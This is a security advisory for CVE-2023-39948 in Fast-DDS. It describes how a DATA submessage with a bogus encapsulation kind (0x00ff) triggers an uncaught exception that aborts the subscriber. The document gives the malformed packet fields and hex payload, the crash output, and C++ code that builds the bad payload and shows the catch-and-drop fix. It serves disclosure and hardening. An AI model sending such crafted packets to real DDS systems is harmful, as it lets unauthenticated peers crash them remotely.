
Uncaught fastcdr exception (Unexpected CDR type received) crashing fastdds

High
MiguelCompany published GHSA-x9pj-vrgf-f68f Aug 11, 2023

Package

Fast-DDS

Affected versions

< v2.10.0

Patched versions

>= v2.10.0 / v2.6.5

Description

Summary

This was reported as #3422.
Opening an advisory for CVE assignment as per the request of Miguel.

Details

A BadParamException thrown by Fast CDR when it reads a serialized payload with an unknown encapsulation kind is not caught anywhere in Fast DDS. The uncaught exception reaches std::terminate, so a single malformed DATA submessage aborts the receiving Fast DDS process.

PoC

  1. Run a subscriber process
  2. My endpoint goes through PDP and EDP with the subscriber
  3. When writers/readers and topic are matched, my endpoint sends the following DATA submessage to the matched subscriber:
    submessageId: DATA (0x15)
    Flags: 0x05, Data present, Endianness bit
    octetsToNextHeader: 48
    0000 0000 0000 0000 = Extra flags: 0x0000
    Octets to inline QoS: 16
    readerEntityId: 0x00000104 (Application-defined reader (no key): 0x000001)
    writerEntityId: 0x00000103 (Application-defined writer (no key): 0x000001)
    [Topic Information (from Discovery)]
    writerSeqNumber: 1
    serializedData
        encapsulation kind: Unknown (0x00ff)
        encapsulation options: 0x0000
        serializedData: 000000000d0000004d65737361676520697320310000000

Note: the encapsulation kind is 0x00ff, which is not a valid representation identifier (a little-endian CDR payload carries 0x0001). Everything after the header is a well-formed HelloWorld sample, so the header is the only malformed field.

Fast DDS crashes:

$ ./DDSSecureHelloWorldExample subscriber
Starting
Waiting for Data, press Enter to stop the DataReader.
Subscriber matched.
terminate called after throwing an instance of 'eprosima::fastcdr::exception::BadParamException'
  what():  Unexpected CDR type received in Cdr::read_encapsulation
[1]    1931236 abort      ./DDSSecureHelloWorldExample subscriber

Please refer to the attached tcpdump fastdds-assert.pcap.zip for further details. Packet 358 triggers this.
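To make the failure mode and the fix concrete, the following is an added, self-contained C++ model written for this page; it is not Fast DDS or Fast CDR code. BadParamException, read_encapsulation, deserialize_hello_world, on_data_received and build_payload are stand-in names chosen here. The payload layout (4-byte encapsulation header, uint32 index, CDR string "Message is 1") is reconstructed from the dump above, and the identifiers 0x0000 to 0x0003 are the standard RTPS CDR_BE/CDR_LE/PL_CDR_BE/PL_CDR_LE values. The pre-fix behaviour is the exception escaping the deserializer; on_data_received shows the hardening: catch it at the receive path and drop the sample instead of terminating.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <initializer_list>
#include <stdexcept>
#include <string>
#include <vector>

// Stand-in for eprosima::fastcdr::exception::BadParamException (not the library's class).
struct BadParamException : public std::runtime_error {
    using std::runtime_error::runtime_error;
};

// Decoded RTPS serialized-payload encapsulation header: representation identifier + options.
struct Encapsulation {
    uint16_t kind;
    uint16_t options;
    bool little_endian;
};

// Models the check in Cdr::read_encapsulation: the two-byte identifier is read big-endian and
// only the four classic CDR identifiers are accepted. Anything else (the PoC's 0x00ff) throws.
Encapsulation read_encapsulation(const std::vector<uint8_t>& payload, size_t& pos) {
    if (payload.size() < 4) {
        throw BadParamException("Not enough memory in the buffer stream");
    }
    const uint16_t kind = static_cast<uint16_t>((payload[0] << 8) | payload[1]);
    const uint16_t options = static_cast<uint16_t>((payload[2] << 8) | payload[3]);
    pos = 4;
    switch (kind) {
        case 0x0000: return {kind, options, false};  // CDR_BE
        case 0x0001: return {kind, options, true};   // CDR_LE (what the PoC should have carried)
        case 0x0002: return {kind, options, false};  // PL_CDR_BE
        case 0x0003: return {kind, options, true};   // PL_CDR_LE
        default:
            throw BadParamException("Unexpected CDR type received in Cdr::read_encapsulation");
    }
}

// Bounds-checked uint32 read honouring the endianness announced by the header.
uint32_t read_u32(const std::vector<uint8_t>& p, size_t& pos, bool le) {
    if (pos + 4 > p.size()) {
        throw BadParamException("Not enough memory in the buffer stream");
    }
    const uint32_t b0 = p[pos], b1 = p[pos + 1], b2 = p[pos + 2], b3 = p[pos + 3];
    pos += 4;
    return le ? (b0 | (b1 << 8) | (b2 << 16) | (b3 << 24))
              : ((b0 << 24) | (b1 << 16) | (b2 << 8) | b3);
}

// The example's HelloWorld sample type (assumed here): a uint32 index followed by a CDR string.
struct HelloWorld {
    uint32_t index = 0;
    std::string message;
};

// Strict deserializer: a CDR string is a uint32 length (NUL included) followed by the bytes.
// Throws BadParamException on any malformed input, like the library code it models.
HelloWorld deserialize_hello_world(const std::vector<uint8_t>& payload) {
    size_t pos = 0;
    const Encapsulation enc = read_encapsulation(payload, pos);
    HelloWorld hw;
    hw.index = read_u32(payload, pos, enc.little_endian);
    const uint32_t len = read_u32(payload, pos, enc.little_endian);
    if (len == 0 || len > payload.size() - pos || payload[pos + len - 1] != 0) {
        throw BadParamException("Malformed CDR string");
    }
    hw.message.assign(reinterpret_cast<const char*>(&payload[pos]), len - 1);
    return hw;
}

// Receive-path wrapper. Before the fix the exception escaped this layer and std::terminate
// aborted the process; the hardened path catches it and drops the sample instead.
bool on_data_received(const std::vector<uint8_t>& payload, HelloWorld& out) {
    try {
        out = deserialize_hello_world(payload);
        return true;
    } catch (const BadParamException& e) {
        std::fprintf(stderr, "dropping malformed sample: %s\n", e.what());
        return false;
    }
}

// Constructed payload matching the advisory's dump: encapsulation header, then a CDR_LE body
// (index, length 0x0d, "Message is 1", NUL, padding to 4). `kind` is written verbatim so a
// bogus identifier such as 0x00ff can be injected exactly as the PoC does.
std::vector<uint8_t> build_payload(uint16_t kind, uint32_t index, const std::string& msg) {
    std::vector<uint8_t> p = {static_cast<uint8_t>(kind >> 8), static_cast<uint8_t>(kind & 0xff), 0x00, 0x00};
    const uint32_t len = static_cast<uint32_t>(msg.size() + 1);
    for (uint32_t v : {index, len}) {
        for (int i = 0; i < 4; ++i) p.push_back(static_cast<uint8_t>(v >> (8 * i)));
    }
    p.insert(p.end(), msg.begin(), msg.end());
    p.push_back(0);
    while (p.size() % 4 != 0) p.push_back(0);
    return p;
}

int main() {
    HelloWorld hw;
    const bool ok = on_data_received(build_payload(0x0001, 0, "Message is 1"), hw);
    std::printf("kind 0x0001: %s, index=%u message=\"%s\"\n", ok ? "accepted" : "rejected", hw.index, hw.message.c_str());
    const bool bad = on_data_received(build_payload(0x00ff, 0, "Message is 1"), hw);
    std::printf("kind 0x00ff: %s\n", bad ? "accepted" : "rejected (process stays up)");
    return 0;
}
```

The point of the wrapper is where the catch sits: Fast CDR is entitled to throw on garbage, so the boundary that turns untrusted network bytes into a typed sample is the place that must convert every deserialization exception into a dropped sample, not the application's listener. Running the block prints one accepted sample and one rejected one, with the process still alive after the 0x00ff payload that aborted the subscriber in the transcript above.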

Impact

A single malformed DATA submessage from a remote peer crashes any Fast DDS process whose reader it matches. This is a network-reachable denial of service that needs no privileges and no user interaction (CVSS AV:N/PR:N/UI:N/A:H); the PoC above aborts the DDS Security example subscriber.

Severity

High

CVSS overall score

7.5 / 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2023-39948
